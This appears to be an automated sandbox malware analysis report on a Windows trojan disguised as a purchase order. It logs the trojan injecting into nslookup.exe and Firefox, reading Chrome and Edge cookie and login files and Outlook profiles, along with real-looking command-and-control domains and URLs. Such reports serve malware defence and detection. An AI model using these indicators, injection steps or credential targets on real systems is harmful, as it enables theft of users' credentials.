        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E6F2 mov eax, dword ptr fs:[00000030h]3_2_0165E6F2
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E6F2 mov eax, dword ptr fs:[00000030h]3_2_0165E6F2
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016606F1 mov eax, dword ptr fs:[00000030h]3_2_016606F1
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016606F1 mov eax, dword ptr fs:[00000030h]3_2_016606F1
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0161A6C7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A6C7 mov eax, dword ptr fs:[00000030h]3_2_0161A6C7
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161C6A6 mov eax, dword ptr fs:[00000030h]3_2_0161C6A6
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E4690 mov eax, dword ptr fs:[00000030h]3_2_015E4690
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E4690 mov eax, dword ptr fs:[00000030h]3_2_015E4690
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016166B0 mov eax, dword ptr fs:[00000030h]3_2_016166B0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01606962 mov eax, dword ptr fs:[00000030h]3_2_01606962
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01606962 mov eax, dword ptr fs:[00000030h]3_2_01606962
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01606962 mov eax, dword ptr fs:[00000030h]3_2_01606962
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0162096E mov eax, dword ptr fs:[00000030h]3_2_0162096E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0162096E mov edx, dword ptr fs:[00000030h]3_2_0162096E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0162096E mov eax, dword ptr fs:[00000030h]3_2_0162096E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01684978 mov eax, dword ptr fs:[00000030h]3_2_01684978
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01684978 mov eax, dword ptr fs:[00000030h]3_2_01684978
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166C97C mov eax, dword ptr fs:[00000030h]3_2_0166C97C
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01660946 mov eax, dword ptr fs:[00000030h]3_2_01660946
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B4940 mov eax, dword ptr fs:[00000030h]3_2_016B4940
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D8918 mov eax, dword ptr fs:[00000030h]3_2_015D8918
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D8918 mov eax, dword ptr fs:[00000030h]3_2_015D8918
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166892A mov eax, dword ptr fs:[00000030h]3_2_0166892A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0167892B mov eax, dword ptr fs:[00000030h]3_2_0167892B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E908 mov eax, dword ptr fs:[00000030h]3_2_0165E908
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0165E908 mov eax, dword ptr fs:[00000030h]3_2_0165E908
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166C912 mov eax, dword ptr fs:[00000030h]3_2_0166C912
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166E9E0 mov eax, dword ptr fs:[00000030h]3_2_0166E9E0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA9D0 mov eax, dword ptr fs:[00000030h]3_2_015EA9D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA9D0 mov eax, dword ptr fs:[00000030h]3_2_015EA9D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA9D0 mov eax, dword ptr fs:[00000030h]3_2_015EA9D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA9D0 mov eax, dword ptr fs:[00000030h]3_2_015EA9D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA9D0 mov eax, dword ptr fs:[00000030h]3_2_015EA9D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015EA9D0 mov eax, dword ptr fs:[00000030h]3_2_015EA9D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016129F9 mov eax, dword ptr fs:[00000030h]3_2_016129F9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016129F9 mov eax, dword ptr fs:[00000030h]3_2_016129F9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016769C0 mov eax, dword ptr fs:[00000030h]3_2_016769C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016149D0 mov eax, dword ptr fs:[00000030h]3_2_016149D0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AA9D3 mov eax, dword ptr fs:[00000030h]3_2_016AA9D3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016689B3 mov esi, dword ptr fs:[00000030h]3_2_016689B3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016689B3 mov eax, dword ptr fs:[00000030h]3_2_016689B3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016689B3 mov eax, dword ptr fs:[00000030h]3_2_016689B3
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E09AD mov eax, dword ptr fs:[00000030h]3_2_015E09AD
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E09AD mov eax, dword ptr fs:[00000030h]3_2_015E09AD
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F29A0 mov eax, dword ptr fs:[00000030h]3_2_015F29A0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E4859 mov eax, dword ptr fs:[00000030h]3_2_015E4859
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E4859 mov eax, dword ptr fs:[00000030h]3_2_015E4859
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166E872 mov eax, dword ptr fs:[00000030h]3_2_0166E872
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166E872 mov eax, dword ptr fs:[00000030h]3_2_0166E872
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01676870 mov eax, dword ptr fs:[00000030h]3_2_01676870
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01676870 mov eax, dword ptr fs:[00000030h]3_2_01676870
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015F2840 mov ecx, dword ptr fs:[00000030h]3_2_015F2840
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01610854 mov eax, dword ptr fs:[00000030h]3_2_01610854
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161A830 mov eax, dword ptr fs:[00000030h]3_2_0161A830
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168483A mov eax, dword ptr fs:[00000030h]3_2_0168483A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0168483A mov eax, dword ptr fs:[00000030h]3_2_0168483A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01602835 mov eax, dword ptr fs:[00000030h]3_2_01602835
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01602835 mov eax, dword ptr fs:[00000030h]3_2_01602835
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01602835 mov eax, dword ptr fs:[00000030h]3_2_01602835
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01602835 mov ecx, dword ptr fs:[00000030h]3_2_01602835
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01602835 mov eax, dword ptr fs:[00000030h]3_2_01602835
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01602835 mov eax, dword ptr fs:[00000030h]3_2_01602835
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166C810 mov eax, dword ptr fs:[00000030h]3_2_0166C810
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016AA8E4 mov eax, dword ptr fs:[00000030h]3_2_016AA8E4
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161C8F9 mov eax, dword ptr fs:[00000030h]3_2_0161C8F9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0161C8F9 mov eax, dword ptr fs:[00000030h]3_2_0161C8F9
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0160E8C0 mov eax, dword ptr fs:[00000030h]3_2_0160E8C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_016B08C0 mov eax, dword ptr fs:[00000030h]3_2_016B08C0
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015E0887 mov eax, dword ptr fs:[00000030h]3_2_015E0887
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_0166C89D mov eax, dword ptr fs:[00000030h]3_2_0166C89D
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015D8B50 mov eax, dword ptr fs:[00000030h]3_2_015D8B50
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01694B4B mov eax, dword ptr fs:[00000030h]3_2_01694B4B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01694B4B mov eax, dword ptr fs:[00000030h]3_2_01694B4B
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_015DCB7E mov eax, dword ptr fs:[00000030h]3_2_015DCB7E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01676B40 mov eax, dword ptr fs:[00000030h]3_2_01676B40
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exeCode function: 3_2_01676B40 mov eax, dword ptr fs:[00000030h]3_2_01676B40
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Memory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
            NtResumeThread: Direct from: 0x773836AC
            NtMapViewOfSection: Direct from: 0x77382D1C
            NtWriteVirtualMemory: Direct from: 0x77382E3C
            NtProtectVirtualMemory: Direct from: 0x77382F9C
            NtSetInformationThread: Direct from: 0x773763F9
            NtCreateMutant: Direct from: 0x773835CC
            NtNotifyChangeKey: Direct from: 0x77383C2C
            NtSetInformationProcess: Direct from: 0x77382C5C
            NtCreateUserProcess: Direct from: 0x7738371C
            NtQueryInformationProcess: Direct from: 0x77382C26
            NtResumeThread: Direct from: 0x77382FBC
            NtWriteVirtualMemory: Direct from: 0x7738490C
            NtOpenKeyEx: Direct from: 0x77383C9C
            NtReadFile: Direct from: 0x77382ADC
            NtAllocateVirtualMemory: Direct from: 0x77382BFC
            NtDelayExecution: Direct from: 0x77382DDC
            NtQuerySystemInformation: Direct from: 0x77382DFC
            NtOpenSection: Direct from: 0x77382E0C
            NtQueryVolumeInformationFile: Direct from: 0x77382F2C
            NtQuerySystemInformation: Direct from: 0x773848CC
            NtReadVirtualMemory: Direct from: 0x77382E8C
            NtCreateKey: Direct from: 0x77382C6C
            NtClose: Direct from: 0x77382B6C
            NtAllocateVirtualMemory: Direct from: 0x773848EC
            NtQueryAttributesFile: Direct from: 0x77382E6C
            NtSetInformationThread: Direct from: 0x77382B4C
            NtTerminateThread: Direct from: 0x77382FCC
            NtQueryInformationToken: Direct from: 0x77382CAC
            NtOpenKeyEx: Direct from: 0x77382B9C
            NtQueryValueKey: Direct from: 0x77382BEC
            NtDeviceIoControlFile: Direct from: 0x77382AEC
            NtCreateFile: Direct from: 0x77382FEC
            NtOpenFile: Direct from: 0x77382DCC
            NtProtectVirtualMemory: Direct from: 0x77377B2E
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Memory written: C:\Users\user\Desktop\Purchase Order_20240528.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: NULL target: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Section loaded: NULL target: C:\Windows\SysWOW64\nslookup.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: NULL target: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe protection: read write
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: NULL target: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
        Source: C:\Windows\SysWOW64\nslookup.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\nslookup.exe Thread register set: target process: 644
        Source: C:\Windows\SysWOW64\nslookup.exe Thread APC queued: target process: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Process created: C:\Users\user\Desktop\Purchase Order_20240528.exe "C:\Users\user\Desktop\Purchase Order_20240528.exe"
        Source: C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe Process created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"
        Source: C:\Windows\SysWOW64\nslookup.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538343573.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000000.2133422520.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000000.2286187191.00000000010C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538343573.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000000.2133422520.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000000.2286187191.00000000010C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538343573.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000000.2133422520.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000000.2286187191.00000000010C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
        Source: qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000002.4538343573.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000004.00000000.2133422520.00000000016C1000.00000002.00000001.00040000.00000000.sdmp, qFrNDyfVqdmmFLBeyXwBmuB.exe, 00000007.00000000.2286187191.00000000010C1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Queries volume information: C:\Users\user\Desktop\Purchase Order_20240528.exe VolumeInformation
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\Desktop\Purchase Order_20240528.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information

        Source: Yara match File source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\nslookup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\nslookup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\nslookup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\nslookup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Windows\SysWOW64\nslookup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\nslookup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\nslookup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\nslookup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\nslookup.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

        Remote Access Functionality

        Source: Yara match File source: 00000003.00000002.2210026041.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2209421933.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.4539900115.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.4539802866.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000007.00000002.4541673061.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.4538883092.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2213803816.0000000001900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | 13 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
        Behavior Graph
        ID: 1448264 | Sample: Purchase Order_20240528.exe | Startdate: 28/05/2024 | Architecture: WINDOWS | Score: 100

        DNS/IP: www.vpachurch.org.uk, www.shortput.top, 20 other IPs or domains
        Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 10 other signatures

        Process chain:
        1. Purchase Order_20240528.exe (started). Signature: Injects a PE file into a foreign processes
        2. Purchase Order_20240528.exe (started by 1). Signature: Maps a DLL or memory area into another process
        3. qFrNDyfVqdmmFLBeyXwBmuB.exe (injected by 2). Signatures: Uses nslookup.exe to query domains; Found direct / indirect Syscall (likely to bypass EDR)
        4. nslookup.exe (started by 3). Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
        5. qFrNDyfVqdmmFLBeyXwBmuB.exe (injected by 4). Signature: Found direct / indirect Syscall (likely to bypass EDR)
           DNS/IP: www.shortput.top 203.161.43.227, 49741, 49742, 49743 VNPT-AS-VNVNPTCorpVN Malaysia
           DNS/IP: betopfloor.com 108.179.192.228, 49753, 49754, 49755 UNIFIEDLAYER-AS-1US United States
           DNS/IP: 11 other IPs or domains
        6. firefox.exe (started by 4)

        Source | Detection | Scanner | Label | Link
        Purchase Order_20240528.exe | 42% | Virustotal | | Browse
        Purchase Order_20240528.exe | 26% | ReversingLabs | ByteCode-MSIL.Trojan.CrypterX |
        Purchase Order_20240528.exe | 100% | Joe Sandbox ML | |
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        vpachurch.org.uk | 9% | Virustotal | | Browse
        www.shopnaya.fr | 0% | Virustotal | | Browse
        mavonorm-global.uk | 0% | Virustotal | | Browse
        betopfloor.com | 0% | Virustotal | | Browse
        adhdphotography.com | 0% | Virustotal | | Browse
        www.home-stroi0m.ru | 1% | Virustotal | | Browse
        www.mavonorm-global.uk | 1% | Virustotal | | Browse
        www.dolcegusto-quiz.fun | 2% | Virustotal | | Browse
        www.etrading.cloud | 1% | Virustotal | | Browse
        www.vpachurch.org.uk | 4% | Virustotal | | Browse
        Source | Detection | Scanner | Label | Link
        https://www.hover.com/domains/results0%VirustotalBrowse
        http://www.shortput.top/05xu/0%Avira URL Cloudsafe
        http://www.allgiftedmalaysia.com/dkdj/0%Avira URL Cloudsafe
        http://www.shopnaya.fr/9rbi/?5L0=2bCPy0&jTZPp=UlNdZMK3GDRCBA0gS3f3uv0iXo+GpLYhxRIJfHdOWu/UoVzLYqkjSevahCA40rp7GDeAe0gS/eGNqMgOt0FXhd7M6VrSAWuVtivoglmtHt75iy7sMY8OQO52M7HjA3SJMCHiGMs=0%Avira URL Cloudsafe
        http://www.futurereadyteaming.com/d42u/?5L0=2bCPy0&jTZPp=Ze7qbULGym30DRtQWsDfUIjVKpc2N+ML3rKw6d8OwfGV5TB4Wy1SHsGQ3DzxzCIAckJPchaY62h3E/MXdBzELEbBfEli2wFapMH+8i0kZSl6sSBwn68EdR90A4BAIxslEVvZhZo=0%Avira URL Cloudsafe
        http://www.bade.ink/hsw0/0%Avira URL Cloudsafe
        http://www.ilodezu.com/07pn/?5L0=2bCPy0&jTZPp=CkfhBQ0terXRm+kmFpR39GSw1qHfnjo/tEzZ3zV38o+ejGSQGyq9lQZrlkGU0XQ7mu5ow3wpwcVqSHGJiQ9hplKQ2SOdF7l7JcVc6ChkY2r17h/XM0ANapemWrr0lME50EL+8pQ=100%Avira URL Cloudmalware
